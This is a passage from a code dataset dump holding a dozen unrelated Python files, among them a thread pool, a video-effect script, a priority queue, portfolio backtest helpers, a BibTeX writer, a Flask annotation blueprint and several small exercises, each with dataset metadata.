(KeyboardInterrupt, SystemExit):\n                Log.note('Shutdown started, please be patient')\n            except Exception as e:\n                Log.error('Unusual shutdown!', e)\n\n        finally:\n            for t in self.threads:\n                t.keep_running = False\n\n            self.inbound.close()\n            self.outbound.close()\n            for t in self.threads:\n                t.join()\n\n    def execute(self, request):\n        self.inbound.extend(request)\n        num = len(request)\n\n        def output():\n            for i in xrange(num):\n                result = self.outbound.pop()\n                if 'exception' in result:\n                    raise result['exception']\n                else:\n                    yield result['response']\n\n        return output()\n\n    def stop(self):\n        self.inbound.close()\n        for t in self.threads:\n            t.keep_running = False","sub_path":"pycfiles/Bugzilla_ETL-0.3.13353-py2.7/multithread.py","file_name":"multithread.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
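# Editor's sketch (hedged): the worker-pool fan-out/fan-in implemented by the
# Multithread record above resembles what the standard library now provides;
# `function` and `requests` mirror the names used in that record.
from concurrent.futures import ThreadPoolExecutor

def execute_all(function, requests, workers=4):
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(function, **request) for request in requests]
        return [f.result() for f in futures]  # .result() re-raises worker exceptions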
+{"seq_id":"456637284","text":"'''\r\nMade by Tarik S. Riadi for Computer Vision 2019-10, \r\nFacultad de Ingeniería, Universidad de los Andes.\r\n>> Make sure the original video is in the same folder as this script.\r\n>> This script will apply the Anamorphus Temporallis effect to the input video.\r\n>> Recommended max. resolution: Full HD (1920x1080) for time and memory constraints. \r\n   If you wish to try a higher resolution, make sure you have proper hardware. \r\n   You have been warned.\r\n>> Take note of your video's file extension. If yours differs from .mp4, please \r\n   refer to the following website: http://www.fourcc.org/codecs.php \r\n'''\r\n\r\nimport cv2 #Version 4.0\r\n\r\ndef anamorphe(buffer,no_frames,resolution,tot_height,new_Vid):\r\n    print('Creating new video...')\r\n    for frame in range(0,no_frames-resolution):\r\n        new_frame = buffer[frame] #Temporarily assign new frame\r\n        for i in range(0,resolution-1): \r\n            new_frame[int((tot_height/resolution)*i):int((tot_height/resolution)*(i+1))] = buffer[frame+(resolution-i)][int((tot_height/resolution)*i):int((tot_height/resolution)*(i+1))]\r\n        new_Vid.write(new_frame)\r\n\r\n#---------------\r\n# Manage Input.\r\n#--------------- \r\nprint('Welcome to Anamorphe! Remember to write the video names with their corresponding file extension!') \r\nVideoName = input('Video Name: ')\r\nnew_VideoName = input('Anamorphous Video Name: ')\r\nresolution = int(input('Resolution of the effect [default=100]: '))\r\nrescale = input('Video resolution higher than 1080p? 
[y/n]: ')\r\n#------------------------------------\r\n# Read original video and its specs.\r\n#------------------------------------\r\nVid = cv2.VideoCapture(VideoName)\r\nbuffer = [] #List to store the frames, acting as a buffer for the anamorphe function.\r\nprint('Reading input video...')\r\ntotal_frames = int(Vid.get(cv2.CAP_PROP_FRAME_COUNT)) #Count total number of frames.\r\nframes_per_second = int(Vid.get(cv2.CAP_PROP_FPS)) #fps of original video.\r\nwidth, height = int(Vid.get(3)), int(Vid.get(4))\r\nfor i in range(0,total_frames):\r\n    ret, frame = Vid.read()\r\n    if rescale == 'y': #Rescale if video's resolution is greater than FullHD.\r\n        if i == 0:\r\n            print('Rescaling...')\r\n        frame2 = cv2.resize(frame,(1920,1080),fx=0,fy=0,interpolation=cv2.INTER_CUBIC) #Resize resolution to HD.\r\n        buffer.append(frame2)\r\n    else:\r\n        buffer.append(frame)\r\n        \r\nVid.release() #Stop reading video.\r\n#-------------------\r\n# Create new video.\r\n#-------------------\r\nfourcc = cv2.VideoWriter_fourcc(*'MP4V') #http://www.fourcc.org/codecs.php\r\nnew_Vid = cv2.VideoWriter(new_VideoName, fourcc, frames_per_second, (1920,1080))\r\nanamorphe(buffer, total_frames, resolution, height, new_Vid) #Create the effect on video.\r\n#-----------------------------------------------\r\n# Delete unnecessary variables and close videos.\r\n#-----------------------------------------------\r\nprint('Finishing...')\r\ndel buffer, fourcc, resolution\r\nnew_Vid.release()\r\ncv2.destroyAllWindows() #Close Preview window.\r\nprint('All Done!') \r\n ","sub_path":"Tarea1_Riadi.py","file_name":"Tarea1_Riadi.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"503082565","text":"# Creating a node\r\n\r\nclass Node:\r\n    def __init__(self, key, priority):\r\n        self.key = key\r\n        self.priority = priority\r\n    llink=None\r\n    rlink=None\r\n\r\n    #\r\n\r\n\r\nclass PiorityQueue:\r\n\r\n    def __init__(self):\r\n        # Initializing empty queue\r\n        self.queue = []\r\n\r\n    def Insert(self, key, priority):\r\n        n = Node(key, priority)# for adding a value\r\n        l = len(self.queue)\r\n# Checking if the queue is empty\r\n        if len(self.queue) == 0:\r\n            self.queue.append(n)\r\n\r\n        else:\r\n            i = 1\r\n            if self.queue[0].priority > priority:\r\n                self.queue.insert(0, n)\r\n\r\n            else:\r\n                while(i < l and self.queue[i].priority <= priority):\r\n                    i+=1\r\n\r\n                self.queue.insert(i, n)\r\n# Changes the priority of the element\r\n    def Update(self, key, newPriority):\r\n        for i in self.queue:\r\n            if i.key == key:\r\n                print(\"Changed priority of \" + \"(\" + str(i.key) + \",\" + str(i.priority) + \") to \" + str(newPriority))\r\n                i.priority = newPriority\r\n                return\r\n        \r\n        print(\"Node not found\")\r\n    # deletes a value \r\n    def Delete(self,key):\r\n        for i in range(len(self.queue)):\r\n            if(self.queue[i].key == key):\r\n                del self.queue[i]\r\n                print(\"Deleted node\")\r\n                return\r\n        # if value is not in the queue\r\n        print(\"Node not found\")\r\n# for showing the queue\r\n    def Print(self):\r\n        for i in self.queue:\r\n            print(\"[\" + str(i.key) + \",\" + str(i.priority) + \"]\" + \"->\", end=\"\")\r\n        \r\n        print(\"\\n\")\r\n# Gives the element having minimum priority\r\n    def Min(self):\r\n        min = self.queue[0]\r\n        for i in range(len(self.queue)):\r\n            if self.queue[i].priority < min.priority:\r\n                min = self.queue[i]\r\n\r\n        print(\"Minimum node by priority: \")\r\n        print(min.key,\",\",min.priority)\r\n# returns the size of the queue\r\n    def size(self):\r\n        return len(self.queue)\r\n
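# Editor's sketch (aside, not part of the class above): Insert() finds the slot by
# linear scan; the stdlib bisect module finds the same slot in O(log n), assuming a
# parallel list of priorities is kept alongside the node list.
import bisect

def insert_sorted(priorities, nodes, node):
    i = bisect.bisect_right(priorities, node.priority)
    priorities.insert(i, node.priority)
    nodes.insert(i, node)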
# Rlink is the right-most node\r\n# Llink is the left-most node\r\n    def RLink_LLink(self):\r\n        if len(self.queue) == 0:\r\n            return None, None\r\n        \r\n        else:\r\n            return self.queue[0], self.queue[-1]\r\n\r\n\r\n    \r\n\r\n# merges two queues\r\n    def union(self,Q1,Q2):\r\n        n1 = Q1.size() # node count of Queue 1\r\n        n2 = Q2.size() # node count of Queue 2\r\n\r\n        n3 = n1+n2 # adding two counts\r\n        res=0 # resultant output\r\n\r\n        res = PiorityQueue()\r\n        # checking which queue is larger\r\n        if n1 > n2:\r\n            res.queue = Q1.queue + Q2.queue\r\n\r\n        else:\r\n            res.queue = Q2.queue + Q1.queue\r\n\r\n        return res.Print() #final output\r\n    \r\n\r\n\r\n# Driver Code\r\nif __name__ == \"__main__\":\r\n    # creating 2 queues\r\n    q1 = PiorityQueue()\r\n    q2 = PiorityQueue()\r\n\r\n    print(\"----------------------------------Queue 1-------------------------------------------------------\")\r\n    q1.Insert(0,1)\r\n    q1.Insert(0,2)\r\n    q1.Insert(1,1)\r\n    q1.Update(1,0)\r\n    q1.Min()\r\n    q1.Print()\r\n    print(\"----------------------------------Queue 2-------------------------------------------------------\")\r\n\r\n    q2.Insert(5,1)\r\n    q2.Insert(4,2)\r\n    q2.Insert(7,3)\r\n    q2.Insert(5,4)\r\n    q2.Delete(8)\r\n\r\n\r\n    q2.Print()\r\n    print(\"The Union is\")\r\n    q1.union(q1,q2)\r\n\r\n    ","sub_path":"19b-003-cs.py","file_name":"19b-003-cs.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"401850379","text":"import pandas as pd\n\n\ndef divide_code_list_by_quantiles(asset_series: pd.Series, quantiles: int, target_tile: int) -> tuple:\n    counts_per_division = len(asset_series) / quantiles\n    counts_per_division = int(counts_per_division)\n\n    tile = target_tile\n\n    reversed_asset_series = asset_series.sort_values(ascending=False)\n\n    first_quantile = asset_series.index.to_list()[counts_per_division * tile: counts_per_division * (tile + 1)]\n    last_quantile = reversed_asset_series.index.to_list()[counts_per_division * tile: counts_per_division * (tile + 1)]\n    return first_quantile, last_quantile\n\n\ndef apply_equal_weights(code_list: list, for_short=False, exposure=1) -> dict:\n    total_weight = -exposure if for_short else exposure\n    if len(code_list) == 0:\n        weights = {}\n    else:\n        weights = {}\n        weight_per_stock = total_weight / len(code_list)\n        for ticker in code_list:\n            weights[ticker] = weight_per_stock\n    return weights\n\n\ndef get_intersect_code_list(one: list, another: list) -> list:\n    return list(set(one).intersection(set(another)))\n\n\ndef get_no_rebalancing_port_daily_value_df(weight_series: pd.Series, daily_return_df: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"\n    Portfolio asset values without rebalancing.\n    The initial values sum to 1.\n    \"\"\"\n    assert weight_series.sum() == 1\n    initial_value_series = weight_series\n    daily_value_df = daily_return_df.add(1).cumprod().multiply(initial_value_series)\n    return daily_value_df\n\n\ndef get_static_weight_rebalancing_port_daily_value_df(weight_series: pd.Series,\n                                                      daily_return_df: pd.DataFrame,\n                                                      rebalancing_date_list: list) -> pd.DataFrame:\n    \"\"\"\n    Portfolio asset values with rebalancing applied.\n    The index of weight_series must match the columns of daily_return_df.\n    TODO: can this for loop be removed?\n    Assumes both sells and buys happen at the closing price on each rebalancing date.\n    \"\"\"\n\n    port_value_df = pd.DataFrame()\n\n    new_rebalancing_date_list = [*rebalancing_date_list]\n    if new_rebalancing_date_list[-1] != daily_return_df.index[-1].strftime(\"%Y-%m-%d\"):\n        new_rebalancing_date_list.append(daily_return_df.index[-1].strftime(\"%Y-%m-%d\"))\n\n    for i, date in enumerate(new_rebalancing_date_list):\n        if i == 0:\n            start_date = daily_return_df.index[0].strftime(\"%Y-%m-%d\")\n            end_date = date\n            previous_value_series = weight_series\n            date_range = (daily_return_df.index >= start_date) & (daily_return_df.index <= end_date)\n        else:\n            start_date = new_rebalancing_date_list[i - 1]\n            end_date = date\n            previous_value_series = weight_series * port_value_df.iloc[-1].sum()\n            date_range = (daily_return_df.index > start_date) & (daily_return_df.index <= end_date)\n        sliced_daily_return_df = daily_return_df.loc[date_range]\n        sliced_value_df = sliced_daily_return_df.add(1).cumprod().multiply(previous_value_series)\n        port_value_df = pd.concat([port_value_df, sliced_value_df], axis=0)\n    return port_value_df\n\n\n
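# Editor's usage sketch (hypothetical tickers, dates and returns; not from the source):
# the weight index must match the return columns and the weights must sum to 1.
if __name__ == "__main__":
    weights = pd.Series({'AAA': 0.6, 'BBB': 0.4})
    returns = pd.DataFrame(0.001,
                           index=pd.date_range('2020-01-02', periods=250),
                           columns=['AAA', 'BBB'])
    values = get_static_weight_rebalancing_port_daily_value_df(
        weights, returns, rebalancing_date_list=['2020-06-30'])
    print(values.sum(axis=1).tail())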
def get_dynamic_weight_rebalancing_port_daily_value_df(weight_series_list: list,\n                                                       daily_return_df: pd.DataFrame,\n                                                       rebalancing_date_list: list) -> pd.DataFrame:\n    \"\"\"\n    The first item of weight_series_list is the initial weights.\n    Assumes both sells and buys happen at the closing price on each rebalancing date.\n    \"\"\"\n    assert len(weight_series_list) == len(rebalancing_date_list) + 1\n\n    port_value_df = pd.DataFrame()\n\n    new_rebalancing_date_list = [*rebalancing_date_list]\n    if new_rebalancing_date_list[-1] != daily_return_df.index[-1].strftime(\"%Y-%m-%d\"):\n        new_rebalancing_date_list.append(daily_return_df.index[-1].strftime(\"%Y-%m-%d\"))\n\n    sliced_value_df_list = []\n    for i, date in enumerate(new_rebalancing_date_list):\n        print(date)\n        if i == 0:\n            start_date = daily_return_df.index[0].strftime(\"%Y-%m-%d\")\n            end_date = date\n            previous_value_series = weight_series_list[i]\n            date_range = (daily_return_df.index >= start_date) & (daily_return_df.index <= end_date)\n        else:\n            start_date = rebalancing_date_list[i - 1]\n            end_date = date\n            # previous_value_series = weight_series_list[i] * port_value_df.iloc[-1].sum()\n            previous_value_series = weight_series_list[i] * sliced_value_df_list[-1].iloc[-1].sum()\n            date_range = (daily_return_df.index > start_date) & (daily_return_df.index <= end_date)\n        sliced_daily_return_df = daily_return_df.loc[date_range]\n        sliced_value_df = sliced_daily_return_df.add(1).cumprod().multiply(previous_value_series)\n        sliced_value_df_list.append(sliced_value_df)\n    port_value_df = pd.concat([*sliced_value_df_list], axis=0)\n    return port_value_df\n","sub_path":"quantrading/backtest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"242126673","text":"import socket\nimport time\n\nserver = socket.socket()\nserver.bind((\"127.0.0.1\",9999))\nserver.listen()\n\nwhile 1:\n    conn,addr = server.accept()\n    while 1:\n        from_b_data = conn.recv(1024)\n        print(from_b_data.decode(\"utf-8\"))\n        data_heard = b\"HTTP/1.1 200 ok\\r\\n\\r\\n\"\n        conn.send(data_heard)\n        with open(\"test01.html\",mode=\"r\",encoding=\"utf-8\") as f:\n            data = f.read().replace(\"__time__\",str(time.time()))\n        conn.send(data.encode(\"utf-8\"))\n        conn.close()\n\nserver.close()\n\n\n\n","sub_path":"前端/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"208813244","text":"'''\nConversion of references to bibtex format\n'''\n\nfrom ..misc import compact_elements\n\n\ndef _ref_bib(key, ref):\n    '''Convert a single reference to bibtex format\n    '''\n    s = u''\n\n    s += u'@{}{{{},\\n'.format(ref['type'], key)\n\n    entry_lines = []\n    for k, v in ref.items():\n        if k == 'type':\n            continue\n\n        # Handle authors/editors\n        if k == 
'authors':\n entry_lines.append(u' author = {{{}}}'.format(' and '.join(v)))\n elif k == 'editors':\n entry_lines.append(u' editor = {{{}}}'.format(' and '.join(v)))\n else:\n entry_lines.append(u' {} = {{{}}}'.format(k, v))\n\n s += ',\\n'.join(entry_lines)\n s += '\\n}'\n\n return s\n\n\ndef write_bib(refs):\n '''Converts references to bibtex\n '''\n\n full_str = u''\n\n # First, write out the element, description -> key mapping\n # Also make a dict of unique reference to output\n unique_refs = {}\n\n for ref in refs:\n full_str += u'% {}\\n'.format(compact_elements(ref['elements']))\n\n for ri in ref['reference_info']:\n full_str += u'% {}\\n'.format(ri['reference_description'])\n\n refdata = ri['reference_data']\n\n if len(refdata) == 0:\n full_str += u'% (...no reference...)\\n%\\n'\n else:\n full_str += u'% {}\\n%\\n'.format(' '.join(ri['reference_keys']))\n\n for k, r in refdata.items():\n unique_refs[k] = r\n\n full_str += u'\\n\\n'\n\n # Go through them sorted alphabetically by key\n for k, r in sorted(unique_refs.items(), key=lambda x: x[0]):\n full_str += u'{}\\n\\n'.format(_ref_bib(k, r))\n\n return full_str\n","sub_path":"basis_set_exchange/refconverters/bib.py","file_name":"bib.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"52185486","text":"\"\"\"Textpart blueprint\n\"\"\"\n\nimport json\n\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash, \\\n current_app as app\n\nfrom ..controllers import textpart as controller\nfrom ..controllers import document as document_controller\nfrom ..controllers import user\nfrom ..controllers import annotation\n\nfrom .user import admin_required\n\ntextpart = Blueprint('textpart', __name__, template_folder='../templates/textpart')\n\n@textpart.route('//')\ndef index(textpart_id, textpart_version_id):\n \"\"\"Textpart view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'textpart.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='view'\n ))\n\n@textpart.route('///annotate')\ndef annotate(textpart_id, textpart_version_id):\n \"\"\"Annotate view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n sematia_files = app.config['SEMATIA_FILES'][document['name']] \\\n if 'SEMATIA_FILES' in app.config \\\n and document['name'] in app.config['SEMATIA_FILES'] else ''\n\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n orig_annotations = annotation.get_annotations(textpart_version_id, 'o')\n reg_annotations = annotation.get_annotations(textpart_version_id, 'r')\n perseids_validated = user.perseids_validate()\n perseids_id = request.args.get('perseids_id', default='')\n perseids_pubid = request.args.get('perseids_pubid', default='')\n return(render_template(\n 'textpart/annotate.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n 
document=document,\n newer_version=newer_version,\n page='annotate',\n orig_annotations=orig_annotations,\n reg_annotations=reg_annotations,\n perseids_validated=perseids_validated,\n perseids_id=perseids_id,\n perseids_pubid=perseids_pubid,\n title=document['name'],\n sematia=sematia_files,\n ))\n\n@textpart.route('///versions')\ndef versions(textpart_id, textpart_version_id):\n \"\"\"Versions view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'textpart/versions.html',\n textpart_version=textpart_version,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='versions'\n ))\n\n\n\n@textpart.route('///edit')\n@admin_required\ndef edit(textpart_id, textpart_version_id):\n \"\"\"Edit view\n \"\"\"\n textpart_version = controller.get_textpart_version(textpart_version_id)\n textpart_rec = controller.get_textpart(textpart_version['textpart_id'])\n document = controller.get_textpart_document(textpart_version['textpart_id'])\n document_textparts = document_controller.get_textparts(document['id'])\n newer_version = controller.get_newer_version(\n textpart_version_id, textpart_version['textpart_id']\n )\n return(render_template(\n 'edit.html',\n textpart_version=textpart_version,\n document_textparts=document_textparts,\n textpart=textpart_rec,\n document=document,\n newer_version=newer_version,\n title=document['name'],\n page='edit'\n ))\n\n\n\n@textpart.route('///copy')\n@admin_required\ndef copy(textpart_id, textpart_version_id):\n \"\"\"Copy textpart version view\n \"\"\"\n new_id = controller.clone(textpart_version_id)\n if new_id:\n return redirect(url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=new_id\n ))\n return 'Something went wrong! 
Contact webmaster.'\n\n@textpart.route('///annotate/q', methods=['POST'])\n@admin_required\ndef annotate_ajax(textpart_id, textpart_version_id):\n \"\"\"Annotate POST\n \"\"\"\n data = request.json\n\n if data:\n if data['method'] == 'get_xml':\n return annotation.make_xml(textpart_version_id, data['layer'])\n if data['method'] == 'merge_alek':\n return annotation.merge_dukenlp(textpart_id, data['xml'], data['layer'])\n if data['method'] == 'merge_syntax':\n return annotation.merge_syntax(data['file'], data['xml'], data['layer'])\n if data['method'] == 'merge_sister':\n return annotation.merge_syntax(data['file'], data['xml'], data['layer'], sister=1)\n if data['method'] == 'get_alek':\n return json.dumps(annotation.get_dukenlp_comparison(\n textpart_id,\n textpart_version_id))\n if data['method'] == 'get_sematia':\n return json.dumps(annotation.get_sematia(\n textpart_id,\n textpart_version_id,\n data['layer']))\n if data['method'] == 'merge_sematia':\n return annotation.merge_sematia(textpart_id, textpart_version_id,\n data['layer'], data['data'], data['xml'])\n if data['method'] == 'export_to_arethusa':\n return annotation.export_to_arethusa(\n textpart_version_id, data['xml'],\n data['layer'],\n data['data_source']\n )\n\n@textpart.route('///edit/q', methods=['POST'])\n@admin_required\ndef save(textpart_id, textpart_version_id):\n \"\"\"Edit POST\n \"\"\"\n data = request.json\n result = False\n if data:\n result = controller.save_manual(data, textpart_version_id)\n if result:\n flash(u'Tokens saved!', 'success')\n\n else:\n flash(u'An error occurred. Get it fixed by contacting the developer.', 'danger')\n\n return url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=textpart_version_id\n )\n\n@textpart.route('///edit/import_next', methods=['POST'])\n@admin_required\ndef import_next(textpart_id, textpart_version_id):\n \"\"\"Import rest of sentence from next textpart POST\n \"\"\"\n\n result = controller.import_next(textpart_id, textpart_version_id)\n if result:\n flash(u'The rest of the sentence was imported successfully. Remember to delete the tokens from the following textpart', 'success')\n\n else:\n flash(u'An error occurred. Get it fixed by contacting the developer.', 'danger')\n\n return url_for(\n 'textpart.edit',\n textpart_id=textpart_id,\n textpart_version_id=textpart_version_id\n )\n\n@textpart.route('///annotate/upload', methods=['POST'])\n@admin_required\ndef upload(textpart_id, textpart_version_id):\n \"\"\"Upload POST\n \"\"\"\n if 'file' not in request.files:\n return json.dumps({'status': 'Error: No file'})\n file = request.files['file']\n layer = request.form['layer']\n\n if file:\n if file.filename == '':\n return 'Error: no file was uploaded'\n if '.' in file.filename and \\\n file.filename.rsplit('.', 1)[1].lower() in ['xml']:\n return json.dumps(annotation.get_syntax_comparison(\n file, textpart_id, textpart_version_id, layer))\n return 'Error: Only XML files allowed'\n\n return 'Error: unknown'\n","sub_path":"papygreek/blueprints/textpart.py","file_name":"textpart.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479509268","text":"#!/usr/bin/env python3\n__author__ = 'Dmitry V. 
Tishchenko'\nimport optparse\nimport argparse\nimport sys\nimport time\nimport subprocess\n\nmultprog = \"./sieve_multith\"\nuniprog = \"./sieve_unith\"\n\ndef perform_iters(progname, argsline, iterations):\n    args = [progname,]\n    args.extend(argsline)\n    exectime = 0\n    for i in range(iterations):\n        start = time.time()\n        subprocess.call(args)\n        end = time.time()\n        exectime += end - start\n    exectime/= iterations\n    return exectime\n\ndef findopt(iterations, outfile):\n    #M; N; time M[1,20]\n    outformat = \"{:d}; {:d}; {:.3f}\\n\"\n    test_intervals = (1000000000, 100000000, 10000000, 1000000, 100000)\n\n    with open(outfile, 'w') as out:\n        for interval in test_intervals:\n            result = perform_iters(uniprog, [str(interval),], iterations)\n            out.write(str.format(outformat, 1, interval, result*1000))\n        for threads_count in range(2,21):\n            for interval in test_intervals:\n                result = perform_iters(multprog, [str(interval), str(threads_count)], iterations)\n                out.write(str.format(outformat, threads_count, interval, result*1000))\n\ndef compare(iterations, outfile):\n    outformat = \"{:s}; {:d}; {:.3f}\\n\"\n    with open(outfile, 'w') as out:\n        for interval in range(1000000, 1000000001, 1000000):\n            uniresult = perform_iters(uniprog, [str(interval),], iterations)\n            out.write(str.format(outformat, \"UNI\", interval, uniresult*1000))\n            multresult = perform_iters(multprog, [str(interval),\"1\"], iterations)\n            out.write(str.format(outformat, \"MULT\", interval, multresult*1000))\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(prog=\"experiments\")\n    subparsers = parser.add_subparsers(help='subcommands:', dest=\"utility\")\n\n    parser_findopt = subparsers.add_parser('findopt', help='find optimal threads count for this machine')\n    parser_findopt.add_argument(\"--out\", dest=\"outfile\", help=\"output filename\")\n    parser_findopt.add_argument('-i', type=int, default=3, dest=\"iterations\", help='iterations for experiment measurement')\n\n    parser_report1 = subparsers.add_parser('compare', help='compares unithreaded and multithreaded programs')\n    parser_report1.add_argument(\"--out\", dest=\"outfile\", help=\"output filename\")\n    parser_report1.add_argument('-i', type=int, default=3, dest=\"iterations\", help='iterations for experiment measurement')\n\n    args = parser.parse_args()\n    if args.utility == \"findopt\":\n        findopt(args.iterations,args.outfile)\n    elif args.utility == \"compare\":\n        compare(args.iterations,args.outfile)\n\n\n\n","sub_path":"labs/504/tishchenko.dmitry/06_sieve/experiments.py","file_name":"experiments.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"289240918","text":"'''Count the number of 5s in order\nnums = [5,5,10,10,20]\ncount = 0\nmoney = 0\nfor num in nums:\n    # can afford the change\n    money += 5\n    if num > money + 5:\n        print('no')\n        break\n    else:\n        # can make change: there is a 5\n        \n        print('yes') '''\n\n# the global optimum can be derived from local optima, hence a greedy algorithm\nnums = [20,5,10,20,20]\nfive = ten = 0\nfor num in nums:\n    if num == 5:\n        five += 1\n    elif num == 10:\n        ten += 1\n        five -= 1\n    else:\n        if ten > 0:\n            ten -= 1\n            five -= 1\n        else:\n            five -= 3\n    if five < 0:\n        print('no')\n        break\n    else:\n        print('yes')\n","sub_path":"Week_03/柠檬水找0.py","file_name":"柠檬水找0.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"337498902","text":"import cv2 \nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = 
cv2.imread('8_bit.png',0)\nprint(img.shape)\ncv2.imshow(\"image\",img)\ncv2.waitKey(0) \ncv2.destroyAllWindows()\nplt.hist(img.ravel(),256,[0,256]); plt.show()\nlist_img = []\nfor row,index in enumerate(img):\n # print(row)\n list_img = np.concatenate((list_img,index))\nprint(len(list_img))\ncolor = ('b')\nfor i,col in enumerate(color):\n histr = cv2.calcHist([img],[i],None,[256],[0,256])\n plt.plot(histr,color = col)\n plt.xlim([0,256])\nplt.show()\n","sub_path":"histograam.py","file_name":"histograam.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"513411176","text":"# encoding=utf-8\n\nimport argparse\nfrom pytorch_demos.demo1.main import main as pt_m1\nfrom pytorch_demos.demo2.entry import main as pt_m2\nfrom pytorch_demos.demo3.entry import main as pt_m3\nfrom pytorch_demos.demo4.entry import main as pt_m4\nfrom pytorch_demos.demo5.entry import main as pt_m5\nfrom pytorch_demos.demo6.entry import main as pt_m6\nfrom pytorch_demos.demo7.entry import main as pt_m7\nfrom pytorch_demos.demo8.entry import main as pt_m8\nfrom pytorch_demos.demo9.entry import main as pt_m9\nfrom pytorch_demos.demo10.entry import main as pt_m10\nfrom datetime import datetime\n\ntasks = {\n 'Pytorch Mnist': pt_m1,\n 'Dcgan': pt_m2,\n 'Vae': pt_m3,\n 'Mnist hogwild': pt_m4,\n 'Regression': pt_m5,\n 'LSTM wave': pt_m6,\n 'STM Name classify': pt_m7,\n 'LSTM Name generating': pt_m8,\n 'Word languagle model': pt_m9,\n 'My CNN': pt_m10\n}\n\n\ndef launch(func_name, dataset, epoch):\n func = tasks[func_name]\n start = datetime.now()\n print('{:-^60s}'.format(func_name))\n print('%s starts executing at %s' % (func_name.ljust(20), start.strftime('%Y/%m/%d, %H:%M:%S')))\n func(dataset, epoch)\n elapsed = datetime.now() - start\n print('%s finished, Elapsed time:%.4f s' % (func_name.ljust(20), elapsed.seconds))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-a', '--all', help='run all demos', action='store_true')\n parser.add_argument('-n', '--name', help='the name of the task you want to run', type=str, default='Pytorch Mnist')\n parser.add_argument('-e', '--epoch', help='set num of epochs', type=int, default=10)\n parser.add_argument('data', type=str, help='path to data set')\n options = parser.parse_args()\n print(options)\n if options.all:\n print('Run all demos')\n for task in tasks:\n launch(task, options.data, options.epoch)\n else:\n print('Run %s' % options.name)\n launch(options.name, options.data, options.epoch)\n","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"291742849","text":"\n\nfrom __future__ import print_function\nimport os\nimport sys\nif __name__ == \"__main__\":\n# os.chdir('E:\\\\TunnelHough')\n \n ins = open( \"car.lst\", \"r\" )\n array = []\n for line in ins:\n array.append( line.strip() )\n \n fls=array[1:int(array[0])+1]\n features=[]\n positions=[]\n for fl in fls: \n temfile=open(fl+'_surf.txt','r')\n num=int(temfile.readline().strip())\n for i in range(0, num):\n positions.append(temfile.readline().strip())\n features.append(temfile.readline().strip())\n \n temfile.close() \n \n allf=open('allFeatures.txt','wb')\n for fea in features:\n print(fea,file=allf)\n \n allf.close()\n 
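# Editor's sketch (hedged) of the dispatch-table pattern used by launcher.py above:
# argparse selects a task name and a dict maps it to a callable; the demo names
# here are placeholders, not entries from that record.
import argparse

def demo_a(): print('running a')
def demo_b(): print('running b')

TASKS = {'a': demo_a, 'b': demo_b}
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', choices=sorted(TASKS), default='a')
args = parser.parse_args()
TASKS[args.name]()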
